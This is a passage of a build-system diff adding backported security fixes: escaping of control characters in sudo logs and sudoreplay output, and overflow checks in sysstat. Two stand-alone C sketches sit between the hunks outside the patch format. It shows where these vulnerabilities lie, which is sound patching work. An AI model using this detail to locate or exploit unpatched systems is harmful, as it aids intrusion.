+ .Em progname
+-and
++field is not present.
++.It
++The
+ .Em hostname
+-fields are not present.
++is only logged if the
++.Em log_host
++option is enabled.
+ .It
+-If the
++The date does not include the year unless the
+ .Em log_year
+-option is enabled,
+-the date will also include the year.
++option is enabled.
+ .It
+ Lines that are longer than
+ .Em loglinelen
+--- a/doc/sudoreplay.man.in
++++ b/doc/sudoreplay.man.in
+@@ -149,6 +149,15 @@ In this mode,
+ will list available sessions in a format similar to the
+ \fBsudo\fR
+ log file format, sorted by file name (or sequence number).
++Any control characters present in the log data are formatted in octal
++with a leading
++\(oq#\(cq
++character.
++For example, a horizontal tab is displayed as
++\(oq#011\(cq
++and an embedded carriage return is displayed as
++\(oq#015\(cq.
++.sp
+ If a
+ \fIsearch expression\fR
+ is specified, it will be used to restrict the IDs that are displayed.
+--- a/doc/sudoreplay.mdoc.in
++++ b/doc/sudoreplay.mdoc.in
+@@ -142,6 +142,16 @@ In this mode,
+ will list available sessions in a format similar to the
+ .Nm sudo
+ log file format, sorted by file name (or sequence number).
++Any control characters present in the log data are formatted in octal
++with a leading
++.Ql #
++character.
++For example, a horizontal tab is displayed as
++.Ql #011
++and an embedded carriage return is displayed as
++.Ql #015 .
++Space characters in the command name and arguments are also formatted in octal.
++.Pp
+ If a
+ .Ar search expression
+ is specified, it will be used to restrict the IDs that are displayed.
+--- a/include/sudo_compat.h
++++ b/include/sudo_compat.h
+@@ -79,6 +79,12 @@
+ # endif
+ #endif
+
++#ifdef HAVE_FALLTHROUGH_ATTRIBUTE
++# define FALLTHROUGH __attribute__((__fallthrough__))
++#else
++# define FALLTHROUGH do { } while (0)
++#endif
++
+ /*
+ * Given the pointer x to the member m of the struct s, return
+ * a pointer to the containing structure.
+--- a/include/sudo_lbuf.h
++++ b/include/sudo_lbuf.h
+@@ -36,9 +36,15 @@ struct sudo_lbuf {
+
+ typedef int (*sudo_lbuf_output_t)(const char *);
+
++/* Flags for sudo_lbuf_append_esc() */
++#define LBUF_ESC_CNTRL 0x01
++#define LBUF_ESC_BLANK 0x02
++#define LBUF_ESC_QUOTE 0x04
++
+ __dso_public void sudo_lbuf_init_v1(struct sudo_lbuf *lbuf, sudo_lbuf_output_t output, int indent, const char *continuation, int cols);
+ __dso_public void sudo_lbuf_destroy_v1(struct sudo_lbuf *lbuf);
+ __dso_public bool sudo_lbuf_append_v1(struct sudo_lbuf *lbuf, const char *fmt, ...) __printflike(2, 3);
++__dso_public bool sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...) __printflike(3, 4);
+ __dso_public bool sudo_lbuf_append_quoted_v1(struct sudo_lbuf *lbuf, const char *set, const char *fmt, ...) __printflike(3, 4);
+ __dso_public void sudo_lbuf_print_v1(struct sudo_lbuf *lbuf);
+ __dso_public bool sudo_lbuf_error_v1(struct sudo_lbuf *lbuf);
+@@ -47,6 +53,7 @@ __dso_public void sudo_lbuf_clearerr_v1(
+ #define sudo_lbuf_init(_a, _b, _c, _d, _e) sudo_lbuf_init_v1((_a), (_b), (_c), (_d), (_e))
+ #define sudo_lbuf_destroy(_a) sudo_lbuf_destroy_v1((_a))
+ #define sudo_lbuf_append sudo_lbuf_append_v1
++#define sudo_lbuf_append_esc sudo_lbuf_append_esc_v1
+ #define sudo_lbuf_append_quoted sudo_lbuf_append_quoted_v1
+ #define sudo_lbuf_print(_a) sudo_lbuf_print_v1((_a))
+ #define sudo_lbuf_error(_a) sudo_lbuf_error_v1((_a))
+--- a/lib/util/lbuf.c
++++ b/lib/util/lbuf.c
+@@ -93,6 +93,112 @@ sudo_lbuf_expand(struct sudo_lbuf *lbuf,
+ }
+
+ /*
++ * Escape a character in octal form (#0n) and store it as a string
++ * in buf, which must have at least 6 bytes available.
++ * Returns the length of buf, not counting the terminating NUL byte.
++ */
++static int
++escape(unsigned char ch, char *buf)
++{
++ const int len = ch < 0100 ? (ch < 010 ? 3 : 4) : 5;
++
++ /* Work backwards from the least significant digit to most significant. */
++ switch (len) {
++ case 5:
++ buf[4] = (ch & 7) + '0';
++ ch >>= 3;
++ FALLTHROUGH;
++ case 4:
++ buf[3] = (ch & 7) + '0';
++ ch >>= 3;
++ FALLTHROUGH;
++ case 3:
++ buf[2] = (ch & 7) + '0';
++ buf[1] = '0';
++ buf[0] = '#';
++ break;
++ }
++ buf[len] = '\0';
++
++ return len;
++}
++
++/*
++ * Parse the format and append strings, only %s and %% escapes are supported.
++ * Any non-printable characters are escaped in octal as #0nn.
++ */
++bool
++sudo_lbuf_append_esc_v1(struct sudo_lbuf *lbuf, int flags, const char *fmt, ...)
++{
++ unsigned int saved_len = lbuf->len;
++ bool ret = false;
++ const char *s;
++ va_list ap;
++ debug_decl(sudo_lbuf_append_esc, SUDO_DEBUG_UTIL);
++
++ if (sudo_lbuf_error(lbuf))
++ debug_return_bool(false);
++
++#define should_escape(ch) \
++ ((ISSET(flags, LBUF_ESC_CNTRL) && iscntrl((unsigned char)ch)) || \
++ (ISSET(flags, LBUF_ESC_BLANK) && isblank((unsigned char)ch)))
++#define should_quote(ch) \
++ (ISSET(flags, LBUF_ESC_QUOTE) && (ch == '\'' || ch == '\\'))
++
++ va_start(ap, fmt);
++ while (*fmt != '\0') {
++ if (fmt[0] == '%' && fmt[1] == 's') {
++ if ((s = va_arg(ap, char *)) == NULL)
++ s = "(NULL)";
++ while (*s != '\0') {
++ if (should_escape(*s)) {
++ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
++ goto done;
++ lbuf->len += escape(*s++, lbuf->buf + lbuf->len);
++ continue;
++ }
++ if (should_quote(*s)) {
++ if (!sudo_lbuf_expand(lbuf, 2))
++ goto done;
++ lbuf->buf[lbuf->len++] = '\\';
++ lbuf->buf[lbuf->len++] = *s++;
++ continue;
++ }
++ if (!sudo_lbuf_expand(lbuf, 1))
++ goto done;
++ lbuf->buf[lbuf->len++] = *s++;
++ }
++ fmt += 2;
++ continue;
++ }
++ if (should_escape(*fmt)) {
++ if (!sudo_lbuf_expand(lbuf, sizeof("#0177") - 1))
++ goto done;
++ if (*fmt == '\'') {
++ lbuf->buf[lbuf->len++] = '\\';
++ lbuf->buf[lbuf->len++] = *fmt++;
++ } else {
++ lbuf->len += escape(*fmt++, lbuf->buf + lbuf->len);
++ }
++ continue;
++ }
++ if (!sudo_lbuf_expand(lbuf, 1))
++ goto done;
++ lbuf->buf[lbuf->len++] = *fmt++;
++ }
++ ret = true;
++
++done:
++ if (!ret)
++ lbuf->len = saved_len;
++ if (lbuf->size != 0)
++ lbuf->buf[lbuf->len] = '\0';
++ va_end(ap);
++
++ debug_return_bool(ret);
++}
++
++/*
+ * Parse the format and append strings, only %s and %% escapes are supported.
+ * Any characters in set are quoted with a backslash.
+ */
+--- a/lib/util/util.exp.in
++++ b/lib/util/util.exp.in
+@@ -79,6 +79,7 @@ sudo_gethostname_v1
+ sudo_gettime_awake_v1
+ sudo_gettime_mono_v1
+ sudo_gettime_real_v1
++sudo_lbuf_append_esc_v1
+ sudo_lbuf_append_quoted_v1
+ sudo_lbuf_append_v1
+ sudo_lbuf_clearerr_v1
+--- a/plugins/sudoers/logging.c
++++ b/plugins/sudoers/logging.c
+@@ -58,6 +58,7 @@
+ #include <syslog.h>
+
+ #include "sudoers.h"
++#include "sudo_lbuf.h"
+
+ #ifndef HAVE_GETADDRINFO
+ # include "compat/getaddrinfo.h"
+@@ -940,14 +941,6 @@ should_mail(int status)
+ (def_mail_no_perms && !ISSET(status, VALIDATE_SUCCESS)));
+ }
+
+-#define LL_TTY_STR "TTY="
+-#define LL_CWD_STR "PWD=" /* XXX - should be CWD= */
+-#define LL_USER_STR "USER="
+-#define LL_GROUP_STR "GROUP="
+-#define LL_ENV_STR "ENV="
+-#define LL_CMND_STR "COMMAND="
+-#define LL_TSID_STR "TSID="
+-
+ #define IS_SESSID(s) ( \
+ isalnum((unsigned char)(s)[0]) && isalnum((unsigned char)(s)[1]) && \
+ (s)[2] == '/' && \
+@@ -962,14 +955,16 @@ should_mail(int status)
+ static char *
+ new_logline(const char *message, const char *errstr)
+ {
+- char *line = NULL, *evstr = NULL;
+ #ifndef SUDOERS_NO_SEQ
+ char sessid[7];
+ #endif
+ const char *tsid = NULL;
+- size_t len = 0;
++ struct sudo_lbuf lbuf;
++ int i;
+ debug_decl(new_logline, SUDOERS_DEBUG_LOGGING)
+
++ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
++
+ #ifndef SUDOERS_NO_SEQ
+ /* A TSID may be a sudoers-style session ID or a free-form string. */
+ if (sudo_user.iolog_file != NULL) {
+@@ -989,119 +984,55 @@ new_logline(const char *message, const c
+ #endif
+
+ /*
+- * Compute line length
++ * Format the log line as an lbuf, escaping control characters in
++ * octal form (#0nn). Error checking (ENOMEM) is done at the end.
+ */
+- if (message != NULL)
+- len += strlen(message) + 3;
+- if (errstr != NULL)
+- len += strlen(errstr) + 3;
+- len += sizeof(LL_TTY_STR) + 2 + strlen(user_tty);
+- len += sizeof(LL_CWD_STR) + 2 + strlen(user_cwd);
+- if (runas_pw != NULL)
+- len += sizeof(LL_USER_STR) + 2 + strlen(runas_pw->pw_name);
+- if (runas_gr != NULL)
+- len += sizeof(LL_GROUP_STR) + 2 + strlen(runas_gr->gr_name);
+- if (tsid != NULL)
+- len += sizeof(LL_TSID_STR) + 2 + strlen(tsid);
+- if (sudo_user.env_vars != NULL) {
+- size_t evlen = 0;
+- char * const *ep;
+-
+- for (ep = sudo_user.env_vars; *ep != NULL; ep++)
+- evlen += strlen(*ep) + 1;
+- if (evlen != 0) {
+- if ((evstr = malloc(evlen)) == NULL)
+- goto oom;
+- evstr[0] = '\0';
+- for (ep = sudo_user.env_vars; *ep != NULL; ep++) {
+- strlcat(evstr, *ep, evlen);
+- strlcat(evstr, " ", evlen); /* NOTE: last one will fail */
+- }
+- len += sizeof(LL_ENV_STR) + 2 + evlen;
+- }
+- }
+- if (user_cmnd != NULL) {
+- /* Note: we log "sudo -l command arg ..." as "list command arg ..." */
+- len += sizeof(LL_CMND_STR) - 1 + strlen(user_cmnd);
+- if (ISSET(sudo_mode, MODE_CHECK))
+- len += sizeof("list ") - 1;
+- if (user_args != NULL)
+- len += strlen(user_args) + 1;
+- }
+-
+- /*
+- * Allocate and build up the line.
+- */
+- if ((line = malloc(++len)) == NULL)
+- goto oom;
+- line[0] = '\0';
+
+ if (message != NULL) {
+- if (strlcat(line, message, len) >= len ||
+- strlcat(line, errstr ? " : " : " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s%s", message,
++ errstr ? " : " : " ; ");
+ }
+ if (errstr != NULL) {
+- if (strlcat(line, errstr, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- }
+- if (strlcat(line, LL_TTY_STR, len) >= len ||
+- strlcat(line, user_tty, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- if (strlcat(line, LL_CWD_STR, len) >= len ||
+- strlcat(line, user_cwd, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s ; ", errstr);
++ }
++ if (user_tty != NULL) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", user_tty);
++ }
++ if (user_cwd != NULL) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "PWD=%s ; ", user_cwd);
++ }
+ if (runas_pw != NULL) {
+- if (strlcat(line, LL_USER_STR, len) >= len ||
+- strlcat(line, runas_pw->pw_name, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "USER=%s ; ",
++ runas_pw->pw_name);
+ }
+ if (runas_gr != NULL) {
+- if (strlcat(line, LL_GROUP_STR, len) >= len ||
+- strlcat(line, runas_gr->gr_name, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
++ runas_gr->gr_name);
+ }
+ if (tsid != NULL) {
+- if (strlcat(line, LL_TSID_STR, len) >= len ||
+- strlcat(line, tsid, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- }
+- if (evstr != NULL) {
+- if (strlcat(line, LL_ENV_STR, len) >= len ||
+- strlcat(line, evstr, len) >= len ||
+- strlcat(line, " ; ", len) >= len)
+- goto toobig;
+- free(evstr);
+- evstr = NULL;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", tsid);
++ }
++ if (sudo_user.env_vars != NULL) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "ENV=%s", sudo_user.env_vars[0]);
++ for (i = 1; sudo_user.env_vars[i] != NULL; i++) {
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
++ sudo_user.env_vars[i]);
++ }
+ }
+ if (user_cmnd != NULL) {
+- if (strlcat(line, LL_CMND_STR, len) >= len)
+- goto toobig;
+- if (ISSET(sudo_mode, MODE_CHECK) && strlcat(line, "list ", len) >= len)
+- goto toobig;
+- if (strlcat(line, user_cmnd, len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,
++ "COMMAND=%s", user_cmnd);
+ if (user_args != NULL) {
+- if (strlcat(line, " ", len) >= len ||
+- strlcat(line, user_args, len) >= len)
+- goto toobig;
++ sudo_lbuf_append_esc(&lbuf,
++ LBUF_ESC_CNTRL|LBUF_ESC_QUOTE,
++ " %s", user_args);
+ }
+ }
+
+- debug_return_str(line);
+-oom:
+- free(evstr);
++ if (!sudo_lbuf_error(&lbuf))
++ debug_return_str(lbuf.buf);
++
++ sudo_lbuf_destroy(&lbuf);
+ sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
+ debug_return_str(NULL);
+-toobig:
+- free(evstr);
+- free(line);
+- sudo_warnx(U_("internal error, %s overflow"), __func__);
+- debug_return_str(NULL);
+ }
+--- a/plugins/sudoers/sudoreplay.c
++++ b/plugins/sudoers/sudoreplay.c
+@@ -71,6 +71,7 @@
+ #include "sudo_conf.h"
+ #include "sudo_debug.h"
+ #include "sudo_event.h"
++#include "sudo_lbuf.h"
+ #include "sudo_util.h"
+
+ #ifdef HAVE_GETOPT_LONG
+@@ -1353,7 +1354,8 @@ match_expr(struct search_node_list *head
+ }
+
+ static int
+-list_session(char *logfile, regex_t *re, const char *user, const char *tty)
++list_session(struct sudo_lbuf *lbuf, char *logfile, regex_t *re,
++ const char *user, const char *tty)
+ {
+ char idbuf[7], *idstr, *cp;
+ const char *timestr;
+@@ -1386,16 +1388,32 @@ list_session(char *logfile, regex_t *re,
+ }
+ /* XXX - print rows + cols? */
+ timestr = get_timestr(li->tstamp, 1);
+- printf("%s : %s : TTY=%s ; CWD=%s ; USER=%s ; ",
+- timestr ? timestr : "invalid date",
+- li->user, li->tty, li->cwd, li->runas_user);
+- if (li->runas_group)
+- printf("GROUP=%s ; ", li->runas_group);
+- printf("TSID=%s ; COMMAND=%s\n", idstr, li->cmd);
+-
+- ret = 0;
+-
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "%s : %s : ",
++ timestr ? timestr : "invalid date", li->user);
++ if (li->tty != NULL) {
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ",
++ li->tty);
++ }
++ if (li->cwd != NULL) {
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "CWD=%s ; ",
++ li->cwd);
++ }
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", li->runas_user);
++ if (li->runas_group != NULL) {
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
++ li->runas_group);
++ }
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", idstr);
++ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "COMMAND=%s",
++ li->cmd);
++
++ if (!sudo_lbuf_error(lbuf)) {
++ puts(lbuf->buf);
++ ret = 0;
++ }
+ done:
++ lbuf->error = 0;
++ lbuf->len = 0;
+ free_log_info(li);
+ debug_return_int(ret);
+ }
+@@ -1415,6 +1433,7 @@ find_sessions(const char *dir, regex_t *
+ DIR *d;
+ struct dirent *dp;
+ struct stat sb;
++ struct sudo_lbuf lbuf;
+ size_t sdlen, sessions_len = 0, sessions_size = 0;
+ unsigned int i;
+ int len;
+@@ -1426,6 +1445,8 @@ find_sessions(const char *dir, regex_t *
+ #endif
+ debug_decl(find_sessions, SUDO_DEBUG_UTIL)
+
++ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
++
+ d = opendir(dir);
+ if (d == NULL)
+ sudo_fatal(U_("unable to open %s"), dir);
+@@ -1485,7 +1506,7 @@ find_sessions(const char *dir, regex_t *
+
+ /* Check for dir with a log file. */
+ if (lstat(pathbuf, &sb) == 0 && S_ISREG(sb.st_mode)) {
+- list_session(pathbuf, re, user, tty);
++ list_session(&lbuf, pathbuf, re, user, tty);
+ } else {
+ /* Strip off "/log" and recurse if a dir. */
+ pathbuf[sdlen + len - 4] = '\0';
+@@ -1496,6 +1517,7 @@ find_sessions(const char *dir, regex_t *
+ }
+ free(sessions);
+ }
++ sudo_lbuf_destroy(&lbuf);
+
+ debug_return_int(0);
+ }
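
The escaping format itself is easy to demonstrate. Below is a minimal sketch, independent of sudo's lbuf code, that renders control characters the way the patched log lines and sudoreplay -l output are documented to: '#0' followed by the character's octal value, so TAB becomes #011 and CR becomes #015.

    #include <ctype.h>
    #include <stdio.h>

    /* Print s with control characters escaped as "#0<octal>". */
    static void print_escaped(const char *s)
    {
        for (; *s != '\0'; s++) {
            unsigned char ch = (unsigned char)*s;
            if (iscntrl(ch))
                printf("#0%o", ch);   /* '#', a leading '0', then octal digits */
            else
                putchar(ch);
        }
        putchar('\n');
    }

    int main(void)
    {
        /* An argument carrying an escape sequence that could otherwise corrupt
         * a terminal when the log file is viewed. */
        print_escaped("ls \033[2J\tsecret");   /* prints: ls #033[2J#011secret */
        return 0;
    }
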
diff --git a/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
new file mode 100644
index 0000000000..d021873b70
--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
@@ -0,0 +1,26 @@
+Backport of:
+
+From 12648b4e0a8cf486480442efd52f0e0b6cab6e8b Mon Sep 17 00:00:00 2001
+From: "Todd C. Miller" <Todd.Miller@sudo.ws>
+Date: Mon, 13 Mar 2023 08:04:32 -0600
+Subject: [PATCH] Add missing " ; " separator between environment variables and
+ command. This is a regression introduced in sudo 1.9.13. GitHub issue #254.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/sudo-project/sudo/commit/12648b4e0a8cf486480442efd52f0e0b6cab6e8b]
+CVE: CVE-2023-28486 CVE-2023-28487
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/eventlog/eventlog.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+--- a/plugins/sudoers/logging.c
++++ b/plugins/sudoers/logging.c
+@@ -1018,6 +1018,7 @@ new_logline(const char *message, const c
+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
+ sudo_user.env_vars[i]);
+ }
++ sudo_lbuf_append(&lbuf, " ; ");
+ }
+ if (user_cmnd != NULL) {
+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,
diff --git a/meta/recipes-extended/sudo/sudo_1.8.31.bb b/meta/recipes-extended/sudo/sudo_1.8.32.bb
index 39d8817c32..e35bbfa789 100644
--- a/meta/recipes-extended/sudo/sudo_1.8.31.bb
+++ b/meta/recipes-extended/sudo/sudo_1.8.32.bb
@@ -3,12 +3,17 @@ require sudo.inc
SRC_URI = "https://www.sudo.ws/dist/sudo-${PV}.tar.gz \
${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
file://0001-Include-sys-types.h-for-id_t-definition.patch \
+ file://0001-Fix-includes-when-building-with-musl.patch \
+ file://CVE-2022-43995.patch \
+ file://CVE-2023-22809.patch \
+ file://CVE-2023-28486_CVE-2023-28487-1.patch \
+ file://CVE-2023-28486_CVE-2023-28487-2.patch \
"
PAM_SRC_URI = "file://sudo.pam"
-SRC_URI[md5sum] = "ce17ff6e72a70f8d5dabba8abf3cd2de"
-SRC_URI[sha256sum] = "7ea8d97a3cee4c844e0887ea7a1bd80eb54cc98fd77966776cb1a80653ad454f"
+SRC_URI[md5sum] = "a7318202ba391079a0e32933f0fb8bd6"
+SRC_URI[sha256sum] = "5ce3c18c5efbecd5437a0945f314f1822423eaf9a2d7eb7ecf80857bc32246c5"
DEPENDS += " virtual/crypt ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'libpam', '', d)}"
RDEPENDS_${PN} += " ${@bb.utils.contains('DISTRO_FEATURES', 'pam', 'pam-plugin-limits pam-plugin-keyinit', '', d)}"
diff --git a/meta/recipes-extended/sysklogd/sysklogd.inc b/meta/recipes-extended/sysklogd/sysklogd.inc
index 8899daa1b0..e45b256bbe 100644
--- a/meta/recipes-extended/sysklogd/sysklogd.inc
+++ b/meta/recipes-extended/sysklogd/sysklogd.inc
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \
inherit update-rc.d update-alternatives systemd autotools
-SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \
+SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \
file://sysklogd \
file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \
"
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
new file mode 100644
index 0000000000..972cc8938b
--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
@@ -0,0 +1,92 @@
+From 9c4eaf150662ad40607923389d4519bc83b93540 Mon Sep 17 00:00:00 2001
+From: Sebastien <seb@fedora-2.home>
+Date: Sat, 15 Oct 2022 14:24:22 +0200
+Subject: [PATCH] Fix size_t overflow in sa_common.c (GHSL-2022-074)
+
+allocate_structures function located in sa_common.c insufficiently
+checks bounds before arithmetic multiplication allowing for an
+overflow in the size allocated for the buffer representing system
+activities.
+
+This patch checks that the post-multiplied value is not greater than
+UINT_MAX.
+
+Signed-off-by: Sebastien <seb@fedora-2.home>
+
+Upstream-Status: Backport [https://github.com/sysstat/sysstat/commit/9c4eaf150662ad40607923389d4519bc83b93540]
+CVE: CVE-2022-39377
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common.c | 25 +++++++++++++++++++++++++
+ common.h | 2 ++
+ sa_common.c | 6 ++++++
+ 3 files changed, 33 insertions(+)
+
+diff --git a/common.c b/common.c
+index ddfe75d..28d475e 100644
+--- a/common.c
++++ b/common.c
+@@ -1528,4 +1528,29 @@ int parse_values(char *strargv, unsigned char bitmap[], int max_val, const char
+
+ return 0;
+ }
++
++/*
++ ***************************************************************************
++ * Check if the multiplication of the 3 values may be greater than UINT_MAX.
++ *
++ * IN:
++ * @val1 First value.
++ * @val2 Second value.
++ * @val3 Third value.
++ ***************************************************************************
++ */
++void check_overflow(size_t val1, size_t val2, size_t val3)
++{
++ if ((unsigned long long) val1 *
++ (unsigned long long) val2 *
++ (unsigned long long) val3 > UINT_MAX) {
++#ifdef DEBUG
++ fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
++ __FUNCTION__,
++ (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
++#endif
++ exit(4);
++ }
++}
++
+ #endif /* SOURCE_SADC undefined */
+diff --git a/common.h b/common.h
+index 86905ba..75f837a 100644
+--- a/common.h
++++ b/common.h
+@@ -249,6 +249,8 @@ int get_wwnid_from_pretty
+ (char *, unsigned long long *, unsigned int *);
+
+ #ifndef SOURCE_SADC
++void check_overflow
++ (size_t, size_t, size_t);
+ int count_bits
+ (void *, int);
+ int count_csvalues
+diff --git a/sa_common.c b/sa_common.c
+index 8a03099..ff90c1f 100644
+--- a/sa_common.c
++++ b/sa_common.c
+@@ -452,7 +452,13 @@ void allocate_structures(struct activity *act[])
+ int i, j;
+
+ for (i = 0; i < NR_ACT; i++) {
++
+ if (act[i]->nr_ini > 0) {
++
++ /* Look for a possible overflow */
++ check_overflow((size_t) act[i]->msize, (size_t) act[i]->nr_ini,
++ (size_t) act[i]->nr2);
++
+ for (j = 0; j < 3; j++) {
+ SREALLOC(act[i]->buf[j], void,
+ (size_t) act[i]->msize * (size_t) act[i]->nr_ini * (size_t) act[i]->nr2);
+--
+2.25.1
+
diff --git a/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
new file mode 100644
index 0000000000..9a27945a8b
--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
@@ -0,0 +1,46 @@
+Origin: https://github.com/opencontainers/runc/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-02-18
+
+From 954ff2e2673cef48f0ed44668c466eab041db387 Mon Sep 17 00:00:00 2001
+From: Pavel Kopylov <pkopylov@cloudlinux.com>
+Date: Wed, 17 May 2023 11:33:45 +0200
+Subject: [PATCH] Fix an overflow which is still possible for some values.
+
+CVE: CVE-2023-33204
+Upstream-Status: Backport [ upstream: https://github.com/sysstat/sysstat/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
+debian: http://security.debian.org/debian-security/pool/updates/main/s/sysstat/sysstat_12.0.3-2+deb10u2.debian.tar.xz ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+---
+ common.c | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+Index: sysstat-12.0.3/common.c
+===================================================================
+--- sysstat-12.0.3.orig/common.c
++++ sysstat-12.0.3/common.c
+@@ -1449,15 +1449,16 @@ int parse_values(char *strargv, unsigned
+ */
+ void check_overflow(size_t val1, size_t val2, size_t val3)
+ {
+- if ((unsigned long long) val1 *
+- (unsigned long long) val2 *
+- (unsigned long long) val3 > UINT_MAX) {
++ if ((val1 != 0) && (val2 != 0) && (val3 != 0) &&
++ (((unsigned long long) UINT_MAX / (unsigned long long) val1 <
++ (unsigned long long) val2) ||
++ ((unsigned long long) UINT_MAX / ((unsigned long long) val1 * (unsigned long long) val2) <
++ (unsigned long long) val3))) {
+ #ifdef DEBUG
+- fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
+- __FUNCTION__,
+- (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
++ fprintf(stderr, "%s: Overflow detected (%u,%u,%u). Aborting...\n",
++ __FUNCTION__, val1, val2, val3);
+ #endif
+- exit(4);
++ exit(4);
+ }
+ }
+
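
The follow-up fix replaces the widening multiplication with division-based bounds checks, which cannot themselves overflow. Here is a stand-alone sketch of the same idea; mul3_overflows_uint() is an illustrative name, not sysstat's API.

    #include <limits.h>
    #include <stdbool.h>
    #include <stdio.h>

    /* Return true if a * b * c would exceed UINT_MAX, without ever forming a
     * product that could itself wrap around. */
    static bool mul3_overflows_uint(size_t a, size_t b, size_t c)
    {
        if (a == 0 || b == 0 || c == 0)
            return false;                   /* product is zero, cannot overflow */
        if (a > UINT_MAX / b)
            return true;                    /* a * b alone is already too large */
        return c > UINT_MAX / (a * b);      /* safe: a * b <= UINT_MAX here */
    }

    int main(void)
    {
        printf("%d\n", mul3_overflows_uint(1024, 1024, 16));        /* 0: fits      */
        printf("%d\n", mul3_overflows_uint(1 << 20, 1 << 20, 16));  /* 1: overflows */
        return 0;
    }
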
diff --git a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
index 2a90f89d25..ac7b898db9 100644
--- a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
+++ b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
@@ -2,7 +2,10 @@ require sysstat.inc
LIC_FILES_CHKSUM = "file://COPYING;md5=a23a74b3f4caf9616230789d94217acb"
-SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch"
+SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch \
+ file://CVE-2022-39377.patch \
+ file://CVE-2023-33204.patch \
+ "
SRC_URI[md5sum] = "9dfff5fac24e35bd92fb7896debf2ffb"
SRC_URI[sha256sum] = "8edb0e19b514ac560a098a02933a4735b881296d61014db89bf80f05dd7a4732"
diff --git a/meta/recipes-extended/tar/tar/CVE-2021-20193.patch b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
new file mode 100644
index 0000000000..89e8e20844
--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
@@ -0,0 +1,133 @@
+From d9d4435692150fa8ff68e1b1a473d187cc3fd777 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sun, 17 Jan 2021 20:41:11 +0200
